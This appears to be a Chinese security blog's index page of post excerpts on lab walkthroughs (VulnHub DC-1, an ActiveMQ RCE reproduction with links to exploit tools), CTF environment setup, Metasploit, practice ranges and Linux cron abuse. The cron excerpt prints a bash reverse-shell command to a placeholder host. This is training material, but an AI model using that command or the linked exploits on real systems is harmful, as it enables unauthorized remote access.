Yongz丶

写写打靶记录。 靶机地址：https://www.vulnhub.com/entry/dc-1 本篇文章参考： https://blog.csdn.net/nzjdsds/article/details/114484232 https://blog.csdn.net/RestoreJustice/article/details/129612792 信息收集 注：难得一台可以使用 VMware Workstation 直接打开的靶机。 首先查看 Kali IP 地址： 12345678910111213141516171819root at kali in ~ $ ifconfigeth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.10.8.15 netmask 255.255.255.0 broadcast 10.10.8.255 inet6 fe80::c6b4:c54f:b3d3:4226 prefixlen 64 scopeid 0x20 ...

继上一篇 CTFd 搭建之后，紧接着要部署 Web 题了，这里比较麻烦，不过总会有解决办法的。 个人水平有限，Web 题主要是基于 PHP 语言搭建的，不过市面上大部分 CTF 比赛 PHP 占比还是蛮大的。 本篇文章参考： https://www.anyiblog.top/2023/04/13/20230413 https://github.com/ctfhub-team/base_image 基础环境说明常用镜像 本篇文章所有镜像均采用 CTFHub 公开的环境基础镜像，主要使用镜像如下： 镜像名称 环境版本 web_httpd Debian 12 (bookworm) amd64Apache/2.4.57 web_nginx Debian 12 (bookworm) amd64nginx/1.22.1 web_httpd_php_5.6 Debian 9 (stretch) amd64Apache/2.4.25PHP 5.6.40 web_httpd_php_7.4 Debian 11 (bullseye) amd6 ...

在上上上周，好基友突然发来一条关于 ActiveMQ 的漏洞通告，看着是个 0 day，问了下是体制内的通告，那没事了。 紧接着在上上周，就出现 ActiveMQ-RCE 的漏洞通报和漏洞利用文章了，可真快。 这周正好有点空，简单复现一下，原理稍微有点复杂，还是当脚本小子吧（QAQ）。 本篇文章参考： https://mp.weixin.qq.com/s/tCY2RAXG5SCYVPuNhpefsw https://mp.weixin.qq.com/s/MYo5AcGCj17L-viPst3Bag https://blog.csdn.net/xuandaoren/article/details/134137453 https://xz.aliyun.com/t/12929 本篇文章工具： https://github.com/X1r0z/ActiveMQ-RCE https://github.com/sincere9/Apache-ActiveMQ-RCE https://github.com/Fw-fW-fw/activemq_Throwable https://github. ...

自从上半年换了电脑，VMware Workstation 开启的虚拟机就莫名其妙的卡。 卡的地方还很特殊，鼠标和应用都没事儿，就偏偏 Shell 敲命令的时候延迟贼高。 之前都是 SSH 协议用 Xshell 凑合连，最近实在受不了了，花费近一天的时间把这问题解决了。 忘记是哪一步解决的了，干脆就全部列举出来。 参考文章： https://www.cnblogs.com/kinome/p/9897731.html https://www.ddosi.org/vmware17/ https://blog.csdn.net/ArthurCai/article/details/130068796 本机配置： OS Version：Windows 11 专业版 VM Version：VMware Workstation 17.0.0 Pro Other：i9-13980HX、32G VMware Workstation 键鼠输入延迟内存&CPU 由于 Kali Linux 默认是 2G、4核，自身电脑是32G、24核，所以这里将 Kali Linux 虚拟机配 ...

本篇文章相当于 Scott Morris – Andronicus 大佬的文章的译作，加上一点自己的理解。 文章原地址：The Easiest Metasploit Guide You’ll Ever Read 概述 本指南适用于那些了解 Metasploit 是什么、想要学习使用它但不太确定如何开始的人。我们将介绍在工作站上设置实验室的基础知识。 无论您使用 Windows 还是 Linux 作为主机操作系统，本指南都适合您。 将设置以下内容： VMWare Workstation Pro Metasploitable-linux-2 Nessus Kali Linux 前情提要 因为不想详尽地涵盖每一个细节，所以我必须对读者做出一些假设。 您应该已经熟悉以下内容： 如何在操作系统上安装软件（包含：Windows、Linux） 熟悉 Linux 命令行 网络和协议的基础知识 文本编辑器（VIM） 耐心 - 需要很多实践&时间 研究意愿 - 学习兴趣 下载文件，并学习使用他们 使用 Telnet、VNC、FTP 和其他类似的网络客户端 从本质上讲，您应该是一个“P ...

本篇文章依据： https://github.com/guchangan1/All-Defense-Tool 免责声明 重点提醒：本项目工具来源于互联网，是否含带木马及后门请自行甄别！！（尤其是 HW 期间） 本文章所有内容，仅供学习和研究使用,请勿使用项目的技术手段用于非法用途,任何人造成的任何负面影响，与本人无瓜。 本文章所有内容、新闻皆不代表本人态度、立场，如果有建议或方案，欢迎来电。 本文章所有内容、展示的所有工具链接与本人无任何利害关系。 前置工具虚拟机&镜像 工具名称 工具地址 工具说明 VMware Workstation 传送门 VMware Workstation Virtual Box 传送门 Virtual Box Kali Linux 传送门 让我康康，谁没用过 Windows ISO 传送门 MSDN 编辑器 工具名称 工具地址 工具说明 Notepad++ 传送门 替换 Windows 默认 TXT Idea 传送门 还得是他 PyCharm 传送门 还得是他 PhpStorm 传送门 还得是 ...

整理一下自己见过的靶场吧，方便查找，免得天天去百度。 有看见不错的就放上来，不定期更新~ Web 靶场SQL Injection 靶场名称 靶场地址 靶场说明 sqli-labs（php5） 传送门 SQL 注入靶场开山祖师级别 sqli-labs（php7） 传送门 祖师不支持 PHP7，有大佬改了一下 sqli-labs（php7） 传送门 由于没传在 GitHub 上，我拷一份到自己的仓库 XSS Injection 靶场名称 靶场地址 靶场说明 xss-labs 传送门 XSS 注入靶场开山祖师级别 xssgame 传送门 国光大佬改版，会好用一点 Upload File 靶场名称 靶场地址 靶场说明 upload-labs 传送门 文件上传靶场开山祖师级别 upload-labs-docker 传送门 国光大佬改版，使用 Docker 搭建 XXE Injection 靶场名称 靶场地址 靶场说明 xxe-lab 传送门 包含 php、java、python等语言版本的小靶场 JSON Web Tok ...

参考文章： https://www.sqlsec.com/2020/09/xdebug.html https://blog.csdn.net/oqqZuo_1234567/article/details/127799079 https://www.cnblogs.com/wlwman/p/17673520.html https://www.cnblogs.com/beidaxmf/p/14527335.html 之前一直想配置一个 PHP 的代码审计环境，但是又不常用。最近刚好有培训要用到这块，整理一下内容方便后续上课使用（坑是真的多，淦）。 CentOS7 + BT + Xdebug 有的伙伴会有疑问，为什么要使用宝塔，而不是像 PhpStudy、LNMP 等环境工具。 其实理由非常简单，宝塔的几乎个个版本都封装了 Xdebug，这就让安装的过程就变得很简单。 其次，Xdebug 官网对于 Linux 只提供了源码安装，编译过程很容易失败（失败了 N 次）。 CentOS7 + BT 安装 之前有写过 Ubuntu18.04 和宝塔的安装文章， ...

本篇文章参考自： lcamry 的博客 - https://www.cnblogs.com/lcamry lcamry 的文章 - https://files.cnblogs.com/files/lcamry/mysql-injection.pdf（MySQL 注入天书） 国光的文章 - https://www.sqlsec.com/2020/05/sqlilabs.html 注：这里引用自 lcamry 的前言，简单修改了一下，也比较符合自己的处境。 前言 最初看到 SQLi-Labs 也是好几年之前了，依稀记得是在 2019 年，那时候玩了前面的几个关卡，就没有继续下去了。 前几年又因为夯实基础，回头把 SQLi-Labs 刷完了，并写成文档放在了语雀上。 最近因某种原因有需要用到 SQLi-Labs，所以翻出来看了一下。看着熟悉的代码，仿佛看着当初刚学安全的自己。 当初学习安全老累了，网上能找到的资料并不多，不像现在这样的信息爆炸。前几天迪总为了打击盗版，还把自己的课公开了，以前哪有这种好事儿。大伙都是藏着掖着，也很正常，正所谓教会徒弟饿死师傅。 最近也是脑门一热，决 ...

本篇文章参考自： https://mp.weixin.qq.com/s/rmUXqYulX3pyrNfINk90WQ 看本篇文章之前，建议阅读一下之前写的：Linux Bash Shell 探究，不然容易把人看蒙。 计划任务功能在 Windows 系统、Linux 系统中历史很悠久了，方便运维管理。 而在渗透测试中，利用到计划任务的常见的有：挖矿病毒、Redis 未授权、Docker 特权模式逃逸、Cron 提权等，但是在 RedHat 系与 Debian 系 Linux 的计划任务是有一定的区别的，不仔细研究一下遇到了真的很折磨人（深受其害，每次遇到都是问题，淦）。 想起来之前学习 ActiveMQ 漏洞时使用 Corn 提权在 Kali 上复现了一遍，就踩了不少坑。 果然，懒惰乃万恶之源，是时候还债了。 注：本篇文章主要选取两系中的一个作为演示 RedHat 系：CentOS 7 - 10.10.8.137 Debian 系：Kali 2023.3 - 10.10.8.134 问题列举 bash -i >& /dev/tcp/ip/port ...